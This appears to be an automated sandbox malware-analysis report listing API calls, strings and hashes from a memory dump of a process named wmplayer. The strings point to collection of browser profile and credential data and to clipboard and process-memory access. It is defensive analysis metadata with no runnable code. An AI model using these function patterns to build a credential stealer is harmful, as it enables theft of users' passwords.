                                                                                            • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                            • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                            • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                            APIs
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                            • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@FilePointermemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 609303285-0
                                                                                            • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                            • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                            • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                            • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp
                                                                                            • String ID:
                                                                                            • API String ID: 2081463915-0
                                                                                            • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                            • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                            • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                            APIs
                                                                                              • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateErrorHandleLastRead
                                                                                            • String ID:
                                                                                            • API String ID: 2136311172-0
                                                                                            • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                            • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                            • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                            APIs
                                                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@??3@
                                                                                            • String ID:
                                                                                            • API String ID: 1936579350-0
                                                                                            • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                            • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                            • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                            • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                            • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                            • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                            • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                            • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID:
                                                                                            • API String ID: 1294909896-0
                                                                                            • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                            • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                            • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 004098EC
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                            • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                            • GetLastError.KERNEL32 ref: 0040995D
                                                                                            • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                            • GetLastError.KERNEL32 ref: 00409974
                                                                                            • CloseClipboard.USER32 ref: 0040997D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 3604893535-0
                                                                                            APIs
                                                                                            • EmptyClipboard.USER32 ref: 00409882
                                                                                            • wcslen.MSVCRT ref: 0040988F
                                                                                            • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                            • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                            • CloseClipboard.USER32 ref: 004098D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                            • String ID:
                                                                                            • API String ID: 1213725291-0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32 ref: 004182D7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                            • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                            • LocalFree.KERNEL32(?), ref: 00418342
                                                                                            • free.MSVCRT ref: 00418370
                                                                                              • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                              • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                            • String ID: OsError 0x%x (%u)
                                                                                            • API String ID: 2360000266-2664311388
                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Version
                                                                                            • String ID:
                                                                                            • API String ID: 1889659487-0
                                                                                            APIs
                                                                                            • _wcsicmp.MSVCRT ref: 004022A6
                                                                                            • _wcsicmp.MSVCRT ref: 004022D7
                                                                                            • _wcsicmp.MSVCRT ref: 00402305
                                                                                            • _wcsicmp.MSVCRT ref: 00402333
                                                                                              • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                              • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                            • memset.MSVCRT ref: 0040265F
                                                                                            • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                              • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                            • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                            • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                            • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                            • API String ID: 577499730-1134094380
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                            • String ID: :stringdata$ftp://$http://$https://
                                                                                            • API String ID: 2787044678-1921111777
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                            • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                            • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                            • GetDC.USER32 ref: 004140E3
                                                                                            • wcslen.MSVCRT ref: 00414123
                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                            • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                            • _snwprintf.MSVCRT ref: 00414244
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                            • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                            • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                            • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                            • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                            • String ID: %s:$EDIT$STATIC
                                                                                            • API String ID: 2080319088-3046471546
                                                                                            APIs
                                                                                            • EndDialog.USER32(?,?), ref: 00413221
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                            • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                            • memset.MSVCRT ref: 00413292
                                                                                            • memset.MSVCRT ref: 004132B4
                                                                                            • memset.MSVCRT ref: 004132CD
                                                                                            • memset.MSVCRT ref: 004132E1
                                                                                            • memset.MSVCRT ref: 004132FB
                                                                                            • memset.MSVCRT ref: 00413310
                                                                                            • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                            • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                            • memset.MSVCRT ref: 004133C0
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                            • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                            • wcscpy.MSVCRT ref: 0041341F
                                                                                            • _snwprintf.MSVCRT ref: 0041348E
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                            • SetFocus.USER32(00000000), ref: 004134B7
                                                                                            Strings
                                                                                            • {Unknown}, xrefs: 004132A6
                                                                                            • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                            • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                            • API String ID: 4111938811-1819279800
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                            • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                            • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                            • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                            • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                            • EndDialog.USER32(?,?), ref: 0040135E
                                                                                            • DeleteObject.GDI32(?), ref: 0040136A
                                                                                            • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                            • ShowWindow.USER32(00000000), ref: 00401398
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                            • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                            • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                            • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                            • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                            • String ID:
                                                                                            • API String ID: 829165378-0
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                            • wcscpy.MSVCRT ref: 004041D6
                                                                                            • wcscpy.MSVCRT ref: 004041E7
                                                                                            • memset.MSVCRT ref: 00404200
                                                                                            • memset.MSVCRT ref: 00404215
                                                                                            • _snwprintf.MSVCRT ref: 0040422F
                                                                                            • wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 0040426E
                                                                                            • memset.MSVCRT ref: 004042CD
                                                                                            • memset.MSVCRT ref: 004042E2
                                                                                            • _snwprintf.MSVCRT ref: 004042FE
                                                                                            • wcscpy.MSVCRT ref: 00404311
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                            • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                            • API String ID: 2454223109-1580313836
                                                                                            APIs
                                                                                              • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                            • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                            • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                            • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                            • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                            • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                            • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                            • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                            • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                            • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                            • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                              • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                              • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                            • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                            • API String ID: 4054529287-3175352466
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                            • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                            • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                            • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                            • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                            • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                            • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                            • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                            • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                            • API String ID: 667068680-2887671607
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                            • API String ID: 1607361635-601624466
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _snwprintf$memset$wcscpy
                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                            • API String ID: 2000436516-3842416460
                                                                                            APIs
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                              • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                              • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                              • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                              • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                              • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                              • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                              • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                            • LoadIconW.USER32(00000000,00000072), ref: 004035CA
